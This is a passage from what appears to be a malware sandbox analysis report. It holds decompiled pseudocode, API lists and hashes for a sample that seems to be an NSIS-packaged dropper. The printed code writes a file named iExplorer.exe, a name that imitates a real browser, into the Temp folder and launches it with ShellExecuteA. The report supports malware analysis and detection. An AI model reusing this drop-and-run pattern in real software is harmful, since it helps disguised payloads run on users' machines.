					lstrcatA(E0040549D(E004059A4(0x409be8, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409be8);
					E004059A4();
				}
				E00405BD3(0x409be8);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405C6C(0x409be8);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405661(0x409be8);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405680(0x409be8, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404D69(0xffffffe2,  *(_t85 - 0x34));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f0a8;
						goto L32;
					} else {
						E004059A4(0x40a3e8, 0x430000);
						E004059A4(0x430000, 0x409be8);
						E004059C6(_t75, 0x409be8, 0x40a3e8, " C:\Users\hardz\AppData\Local\Temp\iExplorer.exe",  *((intOrPtr*)(_t85 - 0x10)));
						E004059A4(0x430000, 0x40a3e8);
						_t62 = E0040529A(" C:\Users\hardz\AppData\Local\Temp\iExplorer.exe",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f0a8 =  &( *0x42f0a8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409be8);
								_push(0xfffffffa);
								E00404D69();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404D69(0xffffffea,  *(_t85 - 0x34));
				 *0x40928c =  *0x40928c + 1;
				_t43 = E00402EB4( *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x40928c =  *0x40928c - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t83 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t83 - _t75;
				if(_t83 >= _t75) {
					goto L31;
				} else {
					__eflags = _t83 - 0xfffffffe;
					if(_t83 != 0xfffffffe) {
						E004059C6(_t75, 0x409be8, _t83, 0x409be8, 0xffffffee);
					} else {
						E004059C6(_t75, 0x409be8, _t83, 0x409be8, 0xffffffe9);
						lstrcatA(0x409be8,  *(_t85 - 0x34));
					}
					_push(0x200010);
					_push(0x409be8);
					E0040529A();
					goto L29;
				}
				goto L33;
			}
















                                                                      0x00401799
                                                                      0x004017a0
                                                                      0x004017a9
                                                                      0x004017ac
                                                                      0x004017af
                                                                      0x004017bb
                                                                      0x004017bc
                                                                      0x004017d8
                                                                      0x004017be
                                                                      0x004017be
                                                                      0x004017bf
                                                                      0x004017bf
                                                                      0x004017de
                                                                      0x004017e8
                                                                      0x004017e8
                                                                      0x004017ec
                                                                      0x004017ef
                                                                      0x004017f4
                                                                      0x004017f6
                                                                      0x004017f8
                                                                      0x004017fd
                                                                      0x004017fd
                                                                      0x00401808
                                                                      0x00401808
                                                                      0x00401819
                                                                      0x0040181b
                                                                      0x0040181b
                                                                      0x0040181c
                                                                      0x0040181c
                                                                      0x0040181f
                                                                      0x00401822
                                                                      0x00401825
                                                                      0x00401825
                                                                      0x0040182c
                                                                      0x0040183b
                                                                      0x00401840
                                                                      0x00401843
                                                                      0x00401846
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401848
                                                                      0x0040184b
                                                                      0x004018a5
                                                                      0x004018aa
                                                                      0x004015ca
                                                                      0x004026d7
                                                                      0x004026d7
                                                                      0x00402932
                                                                      0x00402935
                                                                      0x00402935
                                                                      0x00000000
                                                                      0x0040184d
                                                                      0x00401853
                                                                      0x0040185e
                                                                      0x0040186b
                                                                      0x00401876
                                                                      0x0040188c
                                                                      0x0040188c
                                                                      0x0040188f
                                                                      0x00000000
                                                                      0x00401895
                                                                      0x00401895
                                                                      0x00401896
                                                                      0x004018b3
                                                                      0x0040293b
                                                                      0x0040293b
                                                                      0x0040293b
                                                                      0x00401898
                                                                      0x00401898
                                                                      0x00401899
                                                                      0x00401495
                                                                      0x00402290
                                                                      0x00402290
                                                                      0x00402290
                                                                      0x00401896
                                                                      0x0040188f
                                                                      0x0040293d
                                                                      0x00402941
                                                                      0x00402941
                                                                      0x004018c3
                                                                      0x004018c8
                                                                      0x004018d6
                                                                      0x004018db
                                                                      0x004018e1
                                                                      0x004018e5
                                                                      0x004018e7
                                                                      0x004018ef
                                                                      0x004018fb
                                                                      0x004018e9
                                                                      0x004018e9
                                                                      0x004018ed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004018ed
                                                                      0x00401904
                                                                      0x0040190a
                                                                      0x0040190c
                                                                      0x00000000
                                                                      0x00401912
                                                                      0x00401912
                                                                      0x00401915
                                                                      0x0040192d
                                                                      0x00401917
                                                                      0x0040191a
                                                                      0x00401923
                                                                      0x00401923
                                                                      0x00401932
                                                                      0x00401937
                                                                      0x0040228b
                                                                      0x00000000
                                                                      0x0040228b
                                                                      0x00000000

                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000,00409BE8,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017D8
                                                                      • CompareFileTime.KERNEL32(-00000014,?,00409BE8,00409BE8,00000000,00000000,00409BE8,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401802
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000,?), ref: 00404DA2
                                                                        • Part of subcall function 00404D69: lstrlenA.KERNEL32(0040300F,00429C60,00000000,0041A9FD,74B5EA30,?,?,?,?,?,?,?,?,?,0040300F,00000000), ref: 00404DB2
                                                                        • Part of subcall function 00404D69: lstrcatA.KERNEL32(00429C60,0040300F,0040300F,00429C60,00000000,0041A9FD,74B5EA30), ref: 00404DC5
                                                                        • Part of subcall function 00404D69: SetWindowTextA.USER32(00429C60,00429C60), ref: 00404DD7
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DFD
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E17
                                                                        • Part of subcall function 00404D69: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E25
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\iExplorer.exe, xrefs: 00401866, 00401882
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 004017C6
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\iExplorer.exe$C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 1941528284-812238309
                                                                      • Opcode ID: a11c56c3c592b783d421f95db97442dc0429df85a07f9da074d3c2c1c021b9ae
                                                                      • Instruction ID: 9a4fdeb023e1cce58347ffb01979746b71cf519e037fe7f86bffddf8920b1442
                                                                      • Opcode Fuzzy Hash: a11c56c3c592b783d421f95db97442dc0429df85a07f9da074d3c2c1c021b9ae
                                                                      • Instruction Fuzzy Hash: 3341C2B1900605BACB10BBA5CD86EBF36B8EF45368F20423FF515F11E2D67C49419A6E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004015D5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 85%
                                                                      			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E00402A9D(0xfffffff0);
				_t10 = E00405530(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004054C8(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401428();
				} else {
					E00401428(0xffffffe6);
					E004059A4("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                      0x004015d5
                                                                      0x004015dc
                                                                      0x004015df
                                                                      0x004015e4
                                                                      0x004015e8
                                                                      0x004015ea
                                                                      0x004015f2
                                                                      0x004015f8
                                                                      0x004015fa
                                                                      0x004015fd
                                                                      0x00401605
                                                                      0x00401612
                                                                      0x0040161f
                                                                      0x0040161f
                                                                      0x00401614
                                                                      0x00401615
                                                                      0x0040161d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040161d
                                                                      0x00401612
                                                                      0x00401622
                                                                      0x00401625
                                                                      0x00401627
                                                                      0x00401628
                                                                      0x004015ea
                                                                      0x0040162f
                                                                      0x0040164f
                                                                      0x004021e5
                                                                      0x00401631
                                                                      0x00401633
                                                                      0x0040163e
                                                                      0x00401644
                                                                      0x00401644
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                        • Part of subcall function 00405530: CharNextA.USER32(004052F0,C:\Users\user\AppData\Local\Temp\,0042B890,?,00405594,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040553E
                                                                        • Part of subcall function 00405530: CharNextA.USER32(00000000), ref: 00405543
                                                                        • Part of subcall function 00405530: CharNextA.USER32(00000000), ref: 00405552
                                                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 00401607
                                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401615
                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401644
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401639
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 3751793516-501415292
                                                                      • Opcode ID: b762a436582f82718d4be78d21757351f54e2f7883bf03ea5df1b6f0ae605340
                                                                      • Instruction ID: 18532858663da7651fa01770c3867fcb30c5352428bd71f74b4ac357e1daad2c
                                                                      • Opcode Fuzzy Hash: b762a436582f82718d4be78d21757351f54e2f7883bf03ea5df1b6f0ae605340
                                                                      • Instruction Fuzzy Hash: 5D012631908140AFDB203B755C089BF3BB49A62324B64063FF591B22E2C63C0C42863E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00401E2E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 66%
                                                                      			E00401E2E() {
				signed int _t7;
				void* _t16;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A9D(_t19);
				_t20 = E00402A9D(0x31);
				_t7 = E00402A9D(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA(" C:\Users\hardz\AppData\Local\Temp\iExplorer.exe", "%s %s");
				E00401428(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t16 = ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\hardz\\AppData\\Local\\Temp",  *(_t26 - 0x18)); // executed
				if(_t16 < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}









                                                                      0x00401e36
                                                                      0x00401e3f
                                                                      0x00401e41
                                                                      0x00401e46
                                                                      0x00401e47
                                                                      0x00401e52
                                                                      0x00401e54
                                                                      0x00401e5f
                                                                      0x00401e6b
                                                                      0x00401e79
                                                                      0x00401e82
                                                                      0x00401e8b
                                                                      0x004026d7
                                                                      0x004026d7
                                                                      0x00402935
                                                                      0x00402941

                                                                      APIs
                                                                      • wsprintfA.USER32 ref: 00401E54
                                                                      • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E82
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\iExplorer.exe, xrefs: 00401E4D
                                                                      • %s %s, xrefs: 00401E48
                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401E6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ExecuteShellwsprintf
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\iExplorer.exe$%s %s$C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 2956387742-1807069092
                                                                      • Opcode ID: b26806dd868fd31dbe9ea857f092dc66767f0ed3d4980ef1dee11b6a6368928c
                                                                      • Instruction ID: f3193567471f81abcd740d58208af08b0de0ff12a2708d7f36330ac78fb70cd5
                                                                      • Opcode Fuzzy Hash: b26806dd868fd31dbe9ea857f092dc66767f0ed3d4980ef1dee11b6a6368928c
                                                                      • Instruction Fuzzy Hash: 4AF0F471B04200AAC711BBB58D4AEAE7BA8DB01318F600836F500F61D2D5BD88919B2C
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004056AF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004056AF(CHAR* _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_t7 =  &_a4; // 0x61736e
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8, _t7, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                      0x004056b3
                                                                      0x004056b9
                                                                      0x004056ba
                                                                      0x004056ba
                                                                      0x004056bb
                                                                      0x004056c2
                                                                      0x004056cc
                                                                      0x004056d0
                                                                      0x004056d9
                                                                      0x004056dc
                                                                      0x004056e4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004056e8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004056ea
                                                                      0x00000000
                                                                      0x004056ea
                                                                      0x00000000

                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 004056C2
                                                                      • GetTempFileNameA.KERNELBASE(?,nsa,00000000,?,?,0040315B,1033,C:\Users\user\AppData\Local\Temp\), ref: 004056DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-1968954121
                                                                      • Opcode ID: 100b786fea9b69b0c64bd6a5d02a0e05a653c47ba9cf0ef0a75673cc49223ef6
                                                                      • Instruction ID: ba2bb07d6120f6483de45d65fc9f3b2ab4f8e9ae98c49aa38cd1930b2257a5d0
                                                                      • Opcode Fuzzy Hash: 100b786fea9b69b0c64bd6a5d02a0e05a653c47ba9cf0ef0a75673cc49223ef6
                                                                      • Instruction Fuzzy Hash: 73F0273230820476D7104E55EC04BDB3F59DF81710F14C02BFA089A2C0D2B199888795
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00403129, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 84%
                                                                      			E00403129(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405BD3(_t6);
				_t2 = E00405509(_t6);
				if(_t2 != 0) {
					E0040549D(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E004056AF("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                      0x0040312a
                                                                      0x00403130
                                                                      0x00403136
                                                                      0x0040313d
                                                                      0x00403142
                                                                      0x0040314a
                                                                      0x00403156
                                                                      0x0040315c
                                                                      0x00403140
                                                                      0x00403140
                                                                      0x00403140

                                                                      APIs
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,*?|<>/":,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C2B
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C38
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C3D
                                                                        • Part of subcall function 00405BD3: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C4D
                                                                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 0040314A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $1033$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 4115351271-698324253
                                                                      • Opcode ID: c3f0b50ca7e5aa46a39d7f63eb6a98f00048d29d84a35505853ea38226ff5a62
                                                                      • Instruction ID: a8723a087280c40a16d5c21e5dc8d7b0d0cf519ea70ea930135e230a4f3188f7
                                                                      • Opcode Fuzzy Hash: c3f0b50ca7e5aa46a39d7f63eb6a98f00048d29d84a35505853ea38226ff5a62
                                                                      • Instruction Fuzzy Hash: 04D09E1150693131C55136263D06FCF255D8F56719F11A477F509B5086966C168249EE
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040136D, Relevance: 3.1, APIs: 2, Instructions: 55windowCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 73%
                                                                      			E0040136D(signed int _a4) {
				intOrPtr* _t8;
				int _t10;
				signed int _t12;
				int _t13;
				int _t14;
				signed int _t21;
				int _t24;
				signed int _t27;
				void* _t28;

				_t27 = _a4;
				while(_t27 >= 0) {
					_t8 = _t27 * 0x1c +  *0x42f050;
					__eflags =  *_t8 - 1;
					if( *_t8 == 1) {
						break;
					}
					_push(_t8); // executed
					_t10 = E00401439(); // executed
					__eflags = _t10 - 0x7fffffff;
					if(_t10 == 0x7fffffff) {
						return 0x7fffffff;
					}
					__eflags = _t10;
					if(__eflags < 0) {
						_t10 = E0040591B(0x430000 - (_t10 + 1 << 0xa), 0x430000);
						__eflags = _t10;
					}
					if(__eflags != 0) {
						_t12 = _t10 - 1;
						_t21 = _t27;
						_t27 = _t12;
						_t13 = _t12 - _t21;
						__eflags = _t13;
					} else {
						_t13 = 1;
						_t27 = _t27 + 1;
					}
					__eflags =  *(_t28 + 0xc);
					if( *(_t28 + 0xc) != 0) {
						 *0x42e80c =  *0x42e80c + _t13;
						_t14 =  *0x42e7f4;
						__eflags = _t14;
						_t24 = (0 | _t14 == 0x00000000) + _t14;
						__eflags = _t24;
						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x42e80c, 0x7530, _t24), 0);
					}
				}
				return 0;
			}












                                                                      0x0040136e
                                                                      0x004013fb
                                                                      0x00401382
                                                                      0x00401384
                                                                      0x00401387
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401389
                                                                      0x0040138a
                                                                      0x0040138f
                                                                      0x00401394
                                                                      0x00000000
                                                                      0x00401409
                                                                      0x00401396
                                                                      0x00401398
                                                                      0x004013a6
                                                                      0x004013ab
                                                                      0x004013ab
                                                                      0x004013ad
                                                                      0x004013b5
                                                                      0x004013b6
                                                                      0x004013b8
                                                                      0x004013ba
                                                                      0x004013ba
                                                                      0x004013af
                                                                      0x004013b1
                                                                      0x004013b2
                                                                      0x004013b2
                                                                      0x004013bc
                                                                      0x004013c1
                                                                      0x004013c3
                                                                      0x004013c9
                                                                      0x004013d2
                                                                      0x004013d7
                                                                      0x004013d7
                                                                      0x004013f5
                                                                      0x004013f5
                                                                      0x004013c1
                                                                      0x00000000

                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: 1729cea53919bd31031296921bac9774217656d22c0054ed41b4153266e7cca5
                                                                      • Instruction ID: 80bb869abca085a0be992480c15044adf3d804e6883710456eb6c92533d47cb1
                                                                      • Opcode Fuzzy Hash: 1729cea53919bd31031296921bac9774217656d22c0054ed41b4153266e7cca5
                                                                      • Instruction Fuzzy Hash: 1501DE727242109FE7185B3ADD09B3B26D8E714314F40423EB952E66F0F6B8DC028B49
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405680, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 68%
                                                                      			E00405680(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                      0x00405684
                                                                      0x00405691
                                                                      0x004056a6
                                                                      0x004056ac

                                                                      APIs
                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402C7B,C:\Users\user\Desktop,80000000,00000003,?,?,?,?,?,?,004032C5,?), ref: 00405684
                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,?,004032C5,?), ref: 004056A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp Download File
